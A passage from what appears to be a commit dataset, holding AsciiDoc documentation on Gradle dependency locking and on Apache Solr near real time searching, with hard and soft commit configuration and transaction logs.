configuration\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/unlockingSingleConfiguration\/groovy\",files=\"build.gradle[tags=locking-one]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/unlockingSingleConfiguration\/kotlin\",files=\"build.gradle.kts[tags=locking-one]\"]\n====\n\n=== Locking buildscript classpath configuration\n\nIf you apply plugins to your build, you may want to leverage dependency locking there as well.\nIn order to lock the <<plugins.adoc#sec:applying_plugins_buildscript,`classpath` configuration>> used for script plugins, do the following:\n\n.Locking buildscript classpath configuration\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingClasspathConfiguration\/groovy\",files=\"build.gradle[tags=locking-classpath]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingClasspathConfiguration\/kotlin\",files=\"build.gradle.kts[tags=locking-classpath]\"]\n====\n\n== Generating and updating dependency locks\n\nIn order to generate or update lock state, you specify the `--write-locks` command line argument in addition to the normal tasks that would trigger configurations to be resolved.\nThis will cause the creation of lock state for each resolved configuration in that build execution.\nNote that if lock state existed previously, it is overwritten.\n\n[[lock_all_configurations_in_one_build_execution]]\n=== Lock all configurations in one build execution\n\nWhen locking multiple configurations, you may want to lock them all at once, during a single build execution.\n\nFor this, you have two options:\n\n* Run `gradle dependencies --write-locks`.\nThis will effectively lock all resolvable configurations that have locking enabled.\nNote that in a multi-project setup, `dependencies` is executed on only _one_ project, the root one in this case.\n* Declare a custom task that will resolve all configurations, as shown below\n\n.Resolving all configurations\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingAllConfigurations\/groovy\",files=\"build.gradle[tags=resolve-all]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingAllConfigurations\/kotlin\",files=\"build.gradle.kts[tags=resolve-all]\"]\n====\n\n
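For illustration, such a task might be sketched as follows (the task name and the filter over resolvable configurations are illustrative):\n\n```\ntask resolveAndLockAll {\n doFirst {\n assert gradle.startParameter.writeDependencyLocks : 'Run this task with --write-locks'\n }\n doLast {\n \/\/ resolving every lockable configuration is what triggers writing its lock state\n configurations.findAll { it.canBeResolved }.each { it.resolve() }\n }\n}\n```\n\n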
That second option, with an appropriate choice of configurations, can be the only option in the native world, where not all configurations can be resolved on a single platform.\n\n== Lock state location and format\n\nLock state will be preserved in a file located in the folder `gradle\/dependency-locks` inside the project or subproject directory.\nEach file is named after the configuration it locks and has the `lockfile` extension.\nThe one exception to this rule is for configurations for the <<plugins.adoc#sec:applying_plugins_buildscript,buildscript itself>>.\nIn that case, the configuration name is prefixed with `buildscript-`.\n\nThe file contains one module notation per line, with a header giving some context.\nModule notations are ordered alphabetically, to ease diffs.\n\n.Lockfile content\n[listing]\n.gradle\/dependency-locks\/compileClasspath.lockfile\n----\ninclude::{samplesPath}\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleConfiguration\/groovy\/gradle\/dependency-locks\/compileClasspath.lockfile[]\n----\n\nwhich matches the following dependency declaration:\n\n.Dynamic dependency declaration\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleConfiguration\/groovy\",files=\"build.gradle[tags=locking-deps]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleConfiguration\/kotlin\",files=\"build.gradle.kts[tags=locking-deps]\"]\n====\n\n
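For illustration, a hypothetical lock state in this per-configuration format (the coordinates and the exact header text are invented):\n\n----\n# This is a Gradle generated file for dependency locking.\n# Manual edits can break the build and are not advised.\n# This file is expected to be part of source control.\norg.apache.commons:commons-lang3:3.9\norg.slf4j:slf4j-api:1.7.25\n----\n\n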
== Running a build with lock state present\n\nThe moment a build needs to resolve a configuration that has locking enabled and finds a matching lock state,\nit will use that state to verify that the given configuration still resolves the same versions.\n\nA successful build indicates that the same dependencies are used as stored in the lock state, regardless of whether new versions matching the dynamic selector have been produced.\n\nThe complete validation is as follows:\n\n* Existing entries in the lock state must be matched in the build\n** A version mismatch or missing resolved module causes a build failure\n* The resolution result must not contain extra dependencies compared to the lock state\n\n[[fine_tuning_dependency_locking_behaviour_with_lock_mode]]\n=== Fine tuning dependency locking behaviour with lock mode\n\nWhile the default lock mode behaves as described above, two other modes are available:\n\nStrict mode::\nIn this mode, in addition to the validations above, dependency locking will fail if a configuration marked as _locked_ does not have lock state associated with it.\n\nLenient mode::\nIn this mode, dependency locking will still pin dynamic versions, but otherwise changes to the dependency resolution are no longer errors.\n\nThe lock mode can be controlled from the `dependencyLocking` block as shown below:\n\n.Setting the lock mode\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockModeSelection\/groovy\",files=\"build.gradle[tags=lock-mode]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockModeSelection\/kotlin\",files=\"build.gradle.kts[tags=lock-mode]\"]\n====\n\n[[selectively_updating_lock_state_entries]]\n== Selectively updating lock state entries\n\nIn order to update only specific modules of a configuration, you can use the `--update-locks` command line flag.\nIt takes a comma-separated list of module notations.\nIn this mode, the existing lock state is still used as input to resolution, filtering out the modules targeted by the update.\n\n----\n\u276f gradle classes --update-locks org.apache.commons:commons-lang3,org.slf4j:slf4j-api\n----\n\nWildcards, indicated with `*`, can be used in the group or module name. They can be the only character or appear at the end of the group or module respectively.\nThe following wildcard notation examples are valid:\n\n* `org.apache.commons:*`: will let all modules belonging to group `org.apache.commons` update\n* `*:guava`: will let all modules named `guava`, whatever their group, update\n* `org.springframework.spring*:spring*`: will let all modules having their group starting with `org.springframework.spring` and name starting with `spring` update\n\n[NOTE]\n====\nThe resolution may cause other module versions to update, as dictated by the Gradle resolution rules.\n====\n\n== Disabling dependency locking\n\n. Make sure that the configuration for which you no longer want locking is no longer configured with locking.\n. Remove the file matching the configurations where you no longer want locking.\n\nIf you only perform the second step above, then locking will effectively no longer be applied.\nHowever, if that configuration happens to be resolved in the future at a time when lock state is persisted, it will once again be locked.\n\n== Single lock file per project\n\nGradle supports an improved lock file format.\nThe goal is to have only a single lock file per project, which contains the lock state for all configurations of said project.\nBy default, the file is named `gradle.lockfile` and is located inside the project directory.\nThe lock state for the buildscript itself is found in a file named `buildscript-gradle.lockfile` inside the project directory.\n\nThe main benefit is a substantial reduction in the number of lock files compared to the format requiring one lockfile per locked configuration.\n\nThis format requires a migration for existing locking users and is thus opt-in.\n\n[NOTE]\n====\nThe objective is to default to this single lock file per project in Gradle 7.0.\n====\n\nThe format can be activated by enabling the matching <<feature_lifecycle#feature_preview, feature preview>>:\n\n.Single lock file per project activation\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/groovy\",files=\"settings.gradle[]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/kotlin\",files=\"settings.gradle.kts[]\"]\n====\n\n
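For illustration, enabling the preview typically amounts to a single line in `settings.gradle` (a sketch, assuming the feature preview is named `ONE_LOCKFILE_PER_PROJECT`):\n\n```\n\/\/ settings.gradle\nenableFeaturePreview('ONE_LOCKFILE_PER_PROJECT')\n```\n\n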
Then with the following dependency declaration and locked configurations:\n\n.Explicit locking\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/groovy\",files=\"build.gradle[tags=locking-explicit]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/kotlin\",files=\"build.gradle.kts[tags=locking-explicit]\"]\n====\n\nThe lockfile will have the following content:\n\n[listing]\n.gradle.lockfile\n----\ninclude::{samplesPath}\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/groovy\/gradle.lockfile[]\n----\n\n* Each line still represents a single dependency in the `group:artifact:version` notation\n* It then lists all configurations that contain the given dependency\n* The last line of the file lists all empty configurations, that is, configurations known to have no dependencies\n\n=== Migrating to the single lockfile per project format\n\nOnce you have activated the feature preview (see above), you can simply follow the documentation for <<#lock_all_configurations_in_one_build_execution, writing>> or <<#selectively_updating_lock_state_entries, updating>> dependency lock state.\n\nThen, after confirming that the single lock file per project contains the lock state for a given configuration, the matching per-configuration lock file can be removed from `gradle\/dependency-locks`.\n\n=== Configuring the per project lock file name and location\n\nWhen using the single lock file per project, you can configure its name and location.\nThe main reason for providing this is to enable file names determined by project properties, effectively allowing a single project to store different lock state for different execution contexts.\nOne trivial example in the JVM ecosystem is the Scala version that is often found in artifact coordinates.\n\n.Changing the lock file name\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/groovy\",files=\"build.gradle[tags=locking-file-name]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/kotlin\",files=\"build.gradle.kts[tags=locking-file-name]\"]\n====\n\n[[locking_limitations]]\n== Locking limitations\n\n* Locking cannot yet be applied to source dependencies.\n\n== Nebula locking plugin\n\nThis feature is inspired by the https:\/\/github.com\/nebula-plugins\/gradle-dependency-lock-plugin[Nebula Gradle dependency lock plugin].\n\n","old_contents":"[[dependency-locking]]\n= Locking dependency versions\n\nUse of dynamic dependency versions (e.g. 
`1.+` or `[1.0,2.0)`) makes builds non-deterministic.\nThis causes builds to break without any obvious change, and worse, can be caused by a transitive dependency that the build author has no control over.\n\nTo achieve https:\/\/reproducible-builds.org\/[reproducible builds], it is necessary to _lock_ versions of dependencies and transitive dependencies such that a build with the same inputs will always resolve the same module versions.\nThis is called _dependency locking_.\n\nIt enables, amongst others, the following scenarios:\n\n* Companies dealing with multi repositories no longer need to rely on `-SNAPSHOT` or changing dependencies,\nwhich sometimes result in cascading failures when a dependency introduces a bug or incompatibility.\nNow dependencies can be declared against major or minor version range, enabling to test with the latest versions on CI while leveraging locking for stable developer builds.\n* Teams that want to always use the latest of their dependencies can use dynamic versions, locking their dependencies only for releases.\nThe release tag will contain the lock states, allowing that build to be fully reproducible when bug fixes need to be developed.\n\nCombined with <<publishing_maven.adoc#publishing_maven:resolved_dependencies,publishing resolved versions>>, you can also replace the declared dynamic version part at publication time.\nConsumers will instead see the versions that your release resolved.\n\nLocking is enabled per <<declaring_dependencies.adoc#sec:what-are-dependency-configurations,dependency configuration>>.\nOnce enabled, you must create an initial lock state.\nIt will cause Gradle to verify that resolution results do not change, resulting in the same selected dependencies even if newer versions are produced.\nModifications to your build that would impact the resolved set of dependencies will cause it to fail.\nThis makes sure that changes, either in published dependencies or build definitions, do not alter resolution without adapting the lock state.\n\n[NOTE]\n====\nDependency locking makes sense only with <<dynamic_versions.adoc#sub:declaring_dependency_with_dynamic_version,dynamic versions>>.\nIt will have no impact on <<dynamic_versions.adoc#sub:declaring_dependency_with_changing_version,changing versions>> (like `-SNAPSHOT`) whose coordinates remain the same, though the content may change.\nGradle will even emit a warning when persisting lock state and changing dependencies are present in the resolution result.\n====\n\n== Enabling locking on configurations\n\nLocking of a configuration happens through the link:{groovyDslPath}\/org.gradle.api.artifacts.ResolutionStrategy.html[ResolutionStrategy]:\n\n.Locking a specific configuration\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleConfiguration\/groovy\",files=\"build.gradle[tags=locking-one]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleConfiguration\/kotlin\",files=\"build.gradle.kts[tags=locking-one]\"]\n====\n\nOr the following, as a way to lock all configurations:\n\n.Locking all configurations\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingAllConfigurations\/groovy\",files=\"build.gradle[tags=locking-all]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingAllConfigurations\/kotlin\",files=\"build.gradle.kts[tags=locking-all]\"]\n====\n\n[NOTE]\n====\nOnly configurations that can be resolved 
\n[NOTE]\n====\nOnly configurations that can be resolved will have lock state attached to them.\nApplying locking on non-resolvable configurations is simply a no-op.\n====\n\n[NOTE]\n====\nThe above will lock all _project_ configurations, but not the _buildscript_ ones.\n====\n\nYou can also disable locking on a specific configuration.\nThis can be useful if a plugin configured locking on all configurations but you happen to add one that should not be locked.\n\n.Unlocking a specific configuration\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/unlockingSingleConfiguration\/groovy\",files=\"build.gradle[tags=locking-one]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/unlockingSingleConfiguration\/kotlin\",files=\"build.gradle.kts[tags=locking-one]\"]\n====\n\n=== Locking buildscript classpath configuration\n\nIf you apply plugins to your build, you may want to leverage dependency locking there as well.\nIn order to lock the <<plugins.adoc#sec:applying_plugins_buildscript,`classpath` configuration>> used for script plugins, do the following:\n\n.Locking buildscript classpath configuration\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingClasspathConfiguration\/groovy\",files=\"build.gradle[tags=locking-classpath]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingClasspathConfiguration\/kotlin\",files=\"build.gradle.kts[tags=locking-classpath]\"]\n====\n\n== Generating and updating dependency locks\n\nIn order to generate or update lock state, you specify the `--write-locks` command line argument in addition to the normal tasks that would trigger configurations to be resolved.\nThis will cause the creation of lock state for each resolved configuration in that build execution.\nNote that if lock state existed previously, it is overwritten.\n\n[[lock_all_configurations_in_one_build_execution]]\n=== Lock all configurations in one build execution\n\nWhen locking multiple configurations, you may want to lock them all at once, during a single build execution.\n\nFor this, you have two options:\n\n* Run `gradle dependencies --write-locks`.\nThis will effectively lock all resolvable configurations that have locking enabled.\nNote that in a multi-project setup, `dependencies` is executed on only _one_ project, the root one in this case.\n* Declare a custom task that will resolve all configurations\n\n.Resolving all configurations\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingAllConfigurations\/groovy\",files=\"build.gradle[tags=resolve-all]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingAllConfigurations\/kotlin\",files=\"build.gradle.kts[tags=resolve-all]\"]\n====\n\nThat second option, with careful selection of the configurations to resolve, can be the only option in the native world, where not all configurations can be resolved on a single platform.\n\n== Lock state location and format\n\nLock state will be preserved in a file located in the folder `gradle\/dependency-locks` inside the project or subproject directory.\nEach file is named by the configuration it locks and has the `lockfile` extension.\nThe one exception to this rule is for configurations for the <<plugins.adoc#sec:applying_plugins_buildscript,buildscript itself>>.\nIn that case the configuration name will be prefixed with `buildscript-`.\n\nThe content of the file is a module notation per line, with a header giving some context.\nModule notations are ordered alphabetically, to ease diffs.\n
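\nSince the included sample file is not rendered inline here, an illustrative per-configuration lockfile (module coordinates invented, header text may vary between Gradle versions) would look like:\n\n[listing]\n----\n# This is a Gradle generated file for dependency locking.\n# Manual edits can break the build and are not advised.\n# This file is expected to be part of source control.\norg.apache.commons:commons-lang3:3.9\norg.slf4j:slf4j-api:1.7.25\n----\n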
\n.Lockfile content\n[listing]\n.gradle\/dependency-locks\/compileClasspath.lockfile\n----\ninclude::{samplesPath}\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleConfiguration\/groovy\/gradle\/dependency-locks\/compileClasspath.lockfile[]\n----\n\nwhich matches the following dependency declaration:\n\n.Dynamic dependency declaration\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleConfiguration\/groovy\",files=\"build.gradle[tags=locking-deps]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleConfiguration\/kotlin\",files=\"build.gradle.kts[tags=locking-deps]\"]\n====\n\n== Running a build with lock state present\n\nThe moment a build needs to resolve a configuration that has locking enabled and it finds a matching lock state,\nit will use it to verify that the given configuration still resolves the same versions.\n\nA successful build indicates that the same dependencies are used as stored in the lock state, regardless of whether newer versions matching the dynamic selector have been produced.\n\nThe complete validation is as follows:\n\n* Existing entries in the lock state must be matched in the build\n** A version mismatch or missing resolved module causes a build failure\n* Resolution result must not contain extra dependencies compared to the lock state\n\n[[fine_tuning_dependency_locking_behaviour_with_lock_mode]]\n=== Fine tuning dependency locking behaviour with lock mode\n\nWhile the default lock mode behaves as described above, two other modes are available:\n\nStrict mode::\nIn this mode, in addition to the validations above, dependency locking will fail if a configuration marked as _locked_ does not have lock state associated with it.\n\nLenient mode::\nIn this mode, dependency locking will still pin dynamic versions, but other changes to the dependency resolution are no longer errors.\n\nThe lock mode can be controlled from the `dependencyLocking` block as shown below:\n\n.Setting the lock mode\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockModeSelection\/groovy\",files=\"build.gradle[tags=lock-mode]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockModeSelection\/kotlin\",files=\"build.gradle.kts[tags=lock-mode]\"]\n====\n\n[[selectively_updating_lock_state_entries]]\n== Selectively updating lock state entries\n\nIn order to update only specific modules of a configuration, you can use the `--update-locks` command line flag.\nIt takes a comma (`,`) separated list of module notations.\nIn this mode, the existing lock state is still used as input to resolution, filtering out the modules targeted by the update.\n\n----\n\u276f gradle classes --update-locks org.apache.commons:commons-lang3,org.slf4j:slf4j-api\n----\n\nWildcards, indicated with `*`, can be used in the group or module name. 
They can be the only character or appear at the end of the group or module respectively.\nThe following wildcard notation examples are valid:\n\n* `org.apache.commons:*`: will let all modules belonging to group `org.apache.commons` update\n* `*:guava`: will let all modules named `guava`, whatever their group, update\n* `org.springframework.spring*:spring*`: will let all modules having their group starting with `org.springframework.spring` and name starting with `spring` update\n\n[NOTE]\n====\nThe resolution may cause other module versions to update, as dictated by the Gradle resolution rules.\n====\n\n== Disabling dependency locking\n\n. Make sure that the configuration for which you no longer want locking is not configured with locking.\n. Remove the file matching the configurations where you no longer want locking.\n\nIf you only perform the second step above, then locking will effectively no longer be applied.\nHowever, if that configuration happens to be resolved in the future at a time where lock state is persisted, it will once again be locked.\n\n== Single lock file per project\n\nGradle now supports an improved lock file format.\nThe goal is to have only a single lock file per project, which contains the lock state for all configurations of said project.\nBy default the file is named `gradle.lockfile` and is located inside the project directory.\nThe lock state for the buildscript itself is found in a file named `buildscript-gradle.lockfile` inside the project directory.\n\nThe main benefit is a substantial reduction in the number of lock files compared to the existing format.\n\nThis format is experimental and requires opt-in.\n\n[NOTE]\n====\nThe objective is to default to this single lock file per project in Gradle 7.0.\n====\n\nThe new format can be activated by enabling the matching <<feature_lifecycle#feature_preview, feature preview>>:\n\n.Single lock file per project activation\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/groovy\",files=\"settings.gradle[]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/kotlin\",files=\"settings.gradle.kts[]\"]\n====\n\nThen with the following dependency declaration and locked configurations:\n\n.Explicit locking\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/groovy\",files=\"build.gradle[tags=locking-explicit]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/kotlin\",files=\"build.gradle.kts[tags=locking-explicit]\"]\n====\n\nThe lockfile will have the following content:\n\n[listing]\n.gradle.lockfile\n----\ninclude::{samplesPath}\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/groovy\/gradle.lockfile[]\n----\n\n* Each line still represents a single dependency in the `group:artifact:version` notation\n* Each line then lists all configurations that contain the given dependency\n* The last line of the file lists all empty configurations, that is configurations known to have no dependencies\n\n=== Migrating to the new file format\n\nOnce you have activated the feature preview (see above), you can simply follow the documentation for <<#lock_all_configurations_in_one_build_execution, writing>> or <<#selectively_updating_lock_state_entries, updating>> dependency lock state.\n\nThen after confirming the single lock file per project 
contains the lock state for a given configuration, the matching per configuration lock file can be removed from `gradle\/dependency-locks`.\n\n=== Configuring the per project lock file name and location\n\nWhen using the single lock file per project, you can configure its name and location.\nThe main reason for providing this is to enable having a file name that is determined by some project properties, effectively allowing a single project to store different lock state for different execution contexts.\nOne trivial example in the JVM ecosystem is the Scala version that is often found in artifact coordinates.\n\n.Changing the lock file name\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/groovy\",files=\"build.gradle[tags=locking-file-name]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/kotlin\",files=\"build.gradle.kts[tags=locking-file-name]\"]\n====\n\n[[locking_limitations]]\n== Locking limitations\n\n* Locking cannot yet be applied to source dependencies.\n\n== Nebula locking plugin\n\nThis feature is inspired by the https:\/\/github.com\/nebula-plugins\/gradle-dependency-lock-plugin[Nebula Gradle dependency lock plugin].\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"57aecde244764c16ee2d5b51cfb2676707d79e57","subject":"SOLR-11446: Heavily edit the 'near real time searching' page in the reference guide, fix doc build error","message":"SOLR-11446: Heavily edit the 'near real time searching' page in the reference guide, fix doc build error\n","repos":"apache\/solr,apache\/solr,apache\/solr,apache\/solr,apache\/solr","old_file":"solr\/solr-ref-guide\/src\/near-real-time-searching.adoc","new_file":"solr\/solr-ref-guide\/src\/near-real-time-searching.adoc","new_contents":"= Near Real Time Searching\n:page-shortname: near-real-time-searching\n:page-permalink: near-real-time-searching.html\n\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\nNear Real Time (NRT) search means that documents are available for search soon after being indexed. NRT searching is one of the main features of SolrCloud and is rarely attempted in master\/slave configurations.\n\nDocument durability and searchability are controlled by `commits`. The \"Near\" in \"Near Real Time\" is configurable to meet the needs of your application. Commits are either \"hard\" or \"soft\" and can be issued by a client (say SolrJ), via a REST call or configured to occur automatically in solrconfig.xml. 
The usual recommendation is to configure your commit strategy in solrconfig.xml (see below) and avoid issuing commits externally.\n\nTypically in NRT applications, hard commits are configured with `openSearcher=false`, and soft commits are configured to make documents visible for search.\n\nWhen a commit occurs, various background tasks are initiated, segment merging for example. These background tasks do not block additional updates to the index nor do they delay the availability of the documents for search.\n\nWhen configuring for NRT, pay special attention to cache and autowarm settings as they can have a significant impact on NRT performance. For extremely short autoCommit intervals, consider disabling caching and autowarming completely.\n\n== Commits and Searching\n\nA *hard commit* calls `fsync` on the index files to ensure they have been flushed to stable storage. The current transaction log is closed and a new one is opened. See the \"transaction log\" discussion below for how data is recovered in the absence of a hard commit. Optionally a hard commit can also make documents visible for search, but this is not recommended for NRT searching as it is more expensive than a soft commit.\n\nA *soft commit* is faster since it only makes index changes visible and does not `fsync` index files, start a new segment or start a new transaction log. Search collections that have NRT requirements will want to soft commit often enough to satisfy the visibility requirements of the application. A softCommit may be \"less expensive\" than a hard commit (openSearcher=true), but it is not free. It is recommended that this be set for as long as is reasonable given the application requirements.\n\nBoth hard and soft commits have two primary configuration parameters: `maxDocs` and `maxTime`.\n\n`maxDocs`::\nInteger. Defines the number of updates to process before activating.\n\n`maxTime`::\nInteger. The number of milliseconds to wait before activating.\n\nIf both of these parameters are specified, the first one to expire is honored. Generally, it is preferred to use `maxTime` rather than `maxDocs`, especially when indexing large numbers of documents in batches. Use `maxDocs` and `maxTime` judiciously to fine-tune your commit strategies.\n\nHard commit has an additional parameter, `openSearcher`.\n\n`openSearcher`::\ntrue|false, whether to make documents visible for search. For NRT applications this is usually set to `false` and `soft commit` is configured to control when documents are visible for search.\n\n=== Transaction Logs (tlogs)\n\nTransaction logs are a \"rolling window\" of updates since the last hard commit. The current transaction log is closed and a new one opened each time any variety of hard commit occurs. Soft commits have no effect on the transaction log.\n\nWhen tlogs are enabled, documents being added to the index are written to the tlog before the indexing call returns to the client. In the event of an un-graceful shutdown (power loss, JVM crash, `kill -9`, etc.) any documents written to the tlog but not yet committed with a hard commit when Solr was stopped are replayed on startup. Therefore the data is not lost.\n\nWhen Solr is shut down gracefully (using the `bin\/solr stop` command) Solr will close the tlog file and index segments so no replay will be necessary on startup.\n\nOne point of confusion is how much data is contained in a tlog. A tlog does not contain all documents, just the ones since the last hard commit. 
There are some low-level details involving `peer sync` that also involve the tlogs that are not relevant to this discussion. Older tlogs are deleted when no longer needed.\n\nWARNING: Implicit in the above is that transaction logs will grow forever if hard commits are disabled. Therefore it is important that hard commits be enabled when indexing.\n\n=== Configuring commits\n\nAs mentioned above, it is usually preferable to configure your commits (both hard and soft) in solrconfig.xml and avoid sending commits from an external source. Check your `solrconfig.xml` file since the defaults are likely not tuned to your needs. Here is an example NRT configuration for the two flavors of commit, a hard commit every 60 seconds and a soft commit every 30 seconds. Note that these are _not_ the values in some of the examples!\n\n[source,xml]\n----\n<autoCommit>\n <maxTime>${solr.autoCommit.maxTime:60000}<\/maxTime>\n <openSearcher>false<\/openSearcher>\n<\/autoCommit>\n\n<autoSoftCommit>\n <maxTime>${solr.autoSoftCommit.maxTime:30000}<\/maxTime>\n <\/autoSoftCommit>\n----\n\nTIP: These parameters can be overridden at run time by defining Java \"system variables\", for example specifying `-Dsolr.autoCommit.maxTime=15000` would override the hard commit interval with a value of 15 seconds.\n\nThe choices for `autoCommit` (with `openSearcher=false`) and `autoSoftCommit` have different consequences. In the event of un-graceful shutdown, it can take up to the time specified in `autoCommit` for Solr to replay the uncommitted documents from the transaction log.\n\nThe time chosen for `autoSoftCommit` determines the maximum time after a document is sent to Solr before it becomes searchable and does not affect the transaction log. Choose as long an interval as your application can tolerate for this value, often 15-60 seconds is reasonable, or even longer depending on the requirements. In situations where the time is set to a very short interval (say 1 second), consider disabling your caches (queryResultCache and filterCache especially) as they will have little utility.\n\nTIP: For extremely high bulk indexing, especially for the initial load if there is no searching, consider turning off `autoSoftCommit` by specifying a value of `-1` for the maxTime parameter.\n\n== Advanced Commit Options\n\nAll varieties of commits can be invoked from a SolrJ client or via a URL. The usual recommendation is to _not_ call commits externally. For those cases where it is desirable, see <<uploading-data-with-index-handlers.adoc#xml-update-commands,Update Commands>>. These options are listed for XML update commands that can be issued from a browser, curl, etc., and the equivalents are available from a SolrJ client.\n
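\nFor illustration only (the collection name `mycollection` is hypothetical), an explicit hard commit can be issued with `curl 'http:\/\/localhost:8983\/solr\/mycollection\/update?commit=true'`, or by posting the equivalent XML update command to the update handler:\n\n[source,xml]\n----\n<commit waitSearcher=\"false\"\/>\n----\n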
","old_contents":"= Near Real Time Searching\n:page-shortname: near-real-time-searching\n:page-permalink: near-real-time-searching.html\n\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\nNear Real Time (NRT) search means that documents are available for search soon after being indexed. NRT searching is one of the main features of SolrCloud and is rarely attempted in master\/slave configurations.\n\nDocument durability and searchability are controlled by `commits`. The \"Near\" in \"Near Real Time\" is configurable to meet the needs of your application. Commits are either \"hard\" or \"soft\" and can be issued by a client (say SolrJ), via a REST call or configured to occur automatically in solrconfig.xml. The usual recommendation is to configure your commit strategy in solrconfig.xml (see below) and avoid issuing commits externally.\n\nTypically in NRT applications, hard commits are configured with `openSearcher=false`, and soft commits are configured to make documents visible for search.\n\nWhen a commit occurs, various background tasks are initiated, segment merging for example. These background tasks do not block additional updates to the index nor do they delay the availability of the documents for search.\n\nWhen configuring for NRT, pay special attention to cache and autowarm settings as they can have a significant impact on NRT performance. For extremely short autoCommit intervals, consider disabling caching and autowarming completely.\n\n== Commits and Searching\n\nA *hard commit* calls `fsync` on the index files to ensure they have been flushed to stable storage. The current transaction log is closed and a new one is opened. See the \"transaction log\" discussion below for how data is recovered in the absence of a hard commit. Optionally a hard commit can also make documents visible for search, but this is not recommended for NRT searching as it is more expensive than a soft commit.\n\nA *soft commit* is faster since it only makes index changes visible and does not `fsync` index files, start a new segment or start a new transaction log. Search collections that have NRT requirements will want to soft commit often enough to satisfy the visibility requirements of the application. A softCommit may be \"less expensive\" than a hard commit (openSearcher=true), but it is not free. It is recommended that this be set for as long as is reasonable given the application requirements.\n\nBoth hard and soft commits have two primary configuration parameters: `maxDocs` and `maxTime`.\n\n`maxDocs`::\nInteger. Defines the number of updates to process before activating.\n\n`maxTime`::\nInteger. The 